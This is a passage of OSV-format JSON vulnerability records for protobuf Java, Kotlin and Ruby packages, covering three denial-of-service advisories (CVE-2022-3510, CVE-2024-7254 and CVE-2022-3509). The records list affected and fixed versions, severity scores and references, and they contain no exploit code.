"3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.1", "3.17.2", "3.17.3", "3.18.0", 
"3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3510" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/db7c17803320525722f45c1d26fc08bc41d1bf48" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf/tree/main/java" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-12-12T22:34:26Z", "nvd_published_at": "2022-12-12T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-735f-pc8j-v9w8", "published": 
"2024-09-19T16:06:03Z", "modified": "2025-09-10T21:15:49.364660Z", "aliases": [ "CVE-2024-7254" ], "related": [ "CGA-2232-8fcm-46m9", "CGA-26vm-c4xx-fw99", "CGA-3jqr-m622-9v65", "CGA-3rgp-cw6g-rj22", "CGA-5j9v-w79r-r73h", "CGA-6xwj-3x88-p9hm", "CGA-8cc7-m97x-rcw7", "CGA-9p42-9pfp-83g9", "CGA-c87c-r7j2-6c2f", "CGA-f6ww-g9c8-j27r", "CGA-gf8j-3f7c-2f6p", "CGA-grm4-x73v-9xcw", "CGA-h5p9-89pr-8jw6", "CGA-h63q-9rr4-x7xq", "CGA-m76c-26vf-3vhr", "CGA-pj84-6mcw-q95g", "CGA-r5c2-7p3p-gp53", "CGA-rjwj-h86r-xhrh", "CGA-v28j-qmhq-qrxf", "CGA-v5fx-59qm-4247", "CGA-xrwq-83cw-2mjc", "RUSTSEC-2024-0437" ], "summary": "protobuf-java has potential Denial of Service issue", "details": "### Summary\nWhen parsing unknown fields in the Protobuf Java Lite and Full library, a maliciously crafted message can cause a StackOverflow error and lead to a program crash.\n\nReporter: Alexis Challande, Trail of Bits Ecosystem Security Team \u003cecosystem@trailofbits.com\u003e\n\nAffected versions: This issue affects all versions of both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.\n\n### Severity\n[CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254) **High** CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)\nThis is a potential Denial of Service. 
Parsing nested groups as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields, creates unbounded recursions that can be abused by an attacker.\n\n### Proof of Concept\nFor reproduction details, please refer to the unit tests (Protobuf Java [LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java) and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java)) that identify the specific inputs that exercise this parsing weakness.\n\n### Remediation and Mitigation\nWe have been working diligently to address this issue and have released a mitigation that is available now. Please update to the latest available versions of the following packages:\n* protobuf-java (3.25.5, 4.27.5, 4.28.2)\n* protobuf-javalite (3.25.5, 4.27.5, 4.28.2)\n* protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)\n* protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)\n* com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "2.0.1", "2.0.3", "2.1.0", "2.2.0", "2.3.0", "2.4.0a", "2.4.1", "2.5.0", "2.6.0", "2.6.1", "3.0.0", "3.0.0-alpha-2", "3.0.0-alpha-3", "3.0.0-alpha-3.1", "3.0.0-beta-1", "3.0.0-beta-2", "3.0.0-beta-3", "3.0.0-beta-4", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", 
"3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.16.3", "3.17.0", "3.17.0-rc-1", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2", "3.20.3", "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0-RC1", "3.22.0-RC3", "3.22.1", "3.22.2", "3.22.3", "3.22.4", "3.22.5", "3.23.0", "3.23.0-RC2", "3.23.0-RC3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0-RC1", "3.24.0-RC2", "3.24.0-RC3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", "3.25.0", "3.25.0-RC1", "3.25.0-RC2", "3.25.1", "3.25.2", "3.25.3", "3.25.4", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.16.3", "3.17.0", "3.17.0-rc-1", 
"3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2", "3.20.3", "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0-RC1", "3.22.0-RC3", "3.22.1", "3.22.2", "3.22.3", "3.22.4", "3.22.5", "3.23.0", "3.23.0-RC2", "3.23.0-RC3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0-RC1", "3.24.0-RC2", "3.24.0-RC3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", "3.25.0", "3.25.0-RC1", "3.25.0-RC2", "3.25.1", "3.25.2", "3.25.3", "3.25.4", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2", "3.20.3", "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0-RC1", "3.22.0-RC3", "3.22.1", "3.22.2", "3.22.3", "3.22.4", "3.22.5", "3.23.0", "3.23.0-RC2", "3.23.0-RC3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0-RC1", "3.24.0-RC2", "3.24.0-RC3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", 
"3.25.0", "3.25.0-RC1", "3.25.0-RC2", "3.25.1", "3.25.2", "3.25.3", "3.25.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2", "3.20.3", "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0-RC1", "3.22.0-RC3", "3.22.1", "3.22.2", "3.22.3", "3.22.4", "3.22.5", "3.23.0", "3.23.0-RC2", "3.23.0-RC3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0-RC1", "3.24.0-RC2", "3.24.0-RC3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", "3.25.0", "3.25.0-RC1", "3.25.0-RC2", "3.25.1", "3.25.2", "3.25.3", "3.25.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.25.5" } ] } ], "versions": [ "3.0.0", "3.0.0.alpha.1.0", "3.0.0.alpha.1.1", "3.0.0.alpha.2.0", "3.0.0.alpha.3", "3.0.0.alpha.3.1.pre", "3.0.0.alpha.4.0", "3.0.0.alpha.5.0.3", "3.0.0.alpha.5.0.4", "3.0.0.alpha.5.0.5", "3.0.0.alpha.5.0.5.1", "3.0.2", "3.1.0", "3.1.0.0.pre", "3.10.0.rc.1", "3.10.1", "3.11.0", 
"3.11.0.rc.1", "3.11.0.rc.2", "3.11.1", "3.11.2", "3.11.3", "3.11.4", "3.12.0", "3.12.0.rc.1", "3.12.0.rc.2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0.rc.3", "3.14.0", "3.14.0.rc.1", "3.14.0.rc.2", "3.14.0.rc.3", "3.15.0", "3.15.0.rc.1", "3.15.0.rc.2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0.rc.1", "3.16.0.rc.2", "3.17.0", "3.17.0.rc.1", "3.17.0.rc.2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0.rc.1", "3.18.0.rc.2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0.rc.1", "3.19.0.rc.2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5", "3.19.6", "3.2.0", "3.2.0.1", "3.2.0.2", "3.2.1.pre", "3.20.0", "3.20.0.rc.1", "3.20.0.rc.2", "3.20.1", "3.20.1.rc.1", "3.20.2", "3.20.3", "3.21.0", "3.21.0.rc.1", "3.21.0.rc.2", "3.21.1", "3.21.10", "3.21.11", "3.21.12", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6", "3.21.7", "3.21.8", "3.21.9", "3.22.0", "3.22.0.rc.2", "3.22.0.rc.3", "3.22.1", "3.22.2", "3.22.3", "3.22.5", "3.23.0", "3.23.0.rc.1", "3.23.0.rc.2", "3.23.0.rc.3", "3.23.1", "3.23.2", "3.23.3", "3.23.4", "3.24.0", "3.24.0.rc.2", "3.24.0.rc.3", "3.24.1", "3.24.2", "3.24.3", "3.24.4", "3.25.0", "3.25.0.rc.1", "3.25.0.rc.2", "3.25.1", "3.25.2", "3.25.3", "3.25.4", "3.3.0", "3.4.0.1", "3.4.0.2", "3.4.1.1", "3.5.0", "3.5.0.pre", "3.5.1", "3.5.1.1", "3.5.1.2", "3.6.0", "3.6.1", "3.7.0", "3.7.0.rc.2", "3.7.0.rc.3", "3.7.1", "3.8.0", "3.8.0.rc.1", "3.9.0", "3.9.0.rc.1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0.rc.1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.26.0", "4.26.0.rc.1", "4.26.0.rc.2", "4.26.0.rc.3", "4.26.1", "4.27.0", "4.27.0.rc.1", "4.27.0.rc.2", "4.27.0.rc.3", 
"4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0.rc.1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0.rc.1", "4.28.0.rc.2", "4.28.0.rc.3", "4.28.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0-RC1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.26.0", "4.26.0-RC1", "4.26.0-RC2", "4.26.0-RC3", "4.26.1", "4.27.0", "4.27.0-RC1", "4.27.0-RC2", "4.27.0-RC3", "4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0-RC1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0-RC1", "4.28.0-RC2", "4.28.0-RC3", "4.28.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { 
"introduced": "4.0.0-RC1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.26.0", "4.26.0-RC1", "4.26.0-RC2", "4.26.0-RC3", "4.26.1", "4.27.0", "4.27.0-RC1", "4.27.0-RC2", "4.27.0-RC3", "4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0-RC1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0-RC1", "4.28.0-RC2", "4.28.0-RC3", "4.28.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0-RC1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.0.0-rc-1", "4.0.0-rc-2", "4.26.0", "4.26.0-RC1", "4.26.0-RC2", "4.26.0-RC3", "4.26.1", "4.27.0", "4.27.0-RC1", "4.27.0-RC2", "4.27.0-RC3", "4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0-RC1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0-RC1", "4.28.0-RC2", "4.28.0-RC3", "4.28.1" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0-RC1" }, { "fixed": "4.27.5" } ] } ], "versions": [ "4.0.0-rc-1", "4.0.0-rc-2", "4.26.0", "4.26.0-RC1", "4.26.0-RC2", "4.26.0-RC3", "4.26.1", "4.27.0", "4.27.0-RC1", "4.27.0-RC2", "4.27.0-RC3", "4.27.1", "4.27.2", "4.27.3", "4.27.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.28.0-RC1" }, { "fixed": "4.28.2" } ] } ], "versions": [ "4.28.0", "4.28.0-RC1", "4.28.0-RC2", "4.28.0-RC3", "4.28.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-735f-pc8j-v9w8/GHSA-735f-pc8j-v9w8.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7254" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/4728531c162f2f9e8c2ca1add713cfee2db6be3b" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/850fcce9176e2c9070614dab53537760498c926b" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/9a5f5fe752a20cbac2e722b06949ac985abdd534" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/ac9fb5b4c71b0dd80985b27684e265d1f03abf46" }, { "type": "WEB", "url": 
"https://github.com/protocolbuffers/protobuf/commit/cc8b3483a5584b3301e3d43d17eb59704857ffaa" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/d6c82fc55a76481c676f541a255571e8950bb8c3" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2024-7254.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241213-0010" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250418-0006" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-400", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2024-09-19T16:06:03Z", "nvd_published_at": "2024-09-19T01:15:10Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g5ww-5jh7-63cx", "published": "2022-12-12T15:30:33Z", "modified": "2025-09-02T20:13:15.173427Z", "aliases": [ "CGA-m9x3-8pwv-rjh3", "CVE-2022-3509" ], "related": [ "CGA-43ph-pj7p-v2hh", "CGA-77gj-vphq-h4fj", "CGA-mr3q-c88f-3c44" ], "summary": "Protobuf Java vulnerable to Uncontrolled Resource Consumption", "details": "A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. 
We recommend updating to the versions mentioned above.", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.0.0", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": 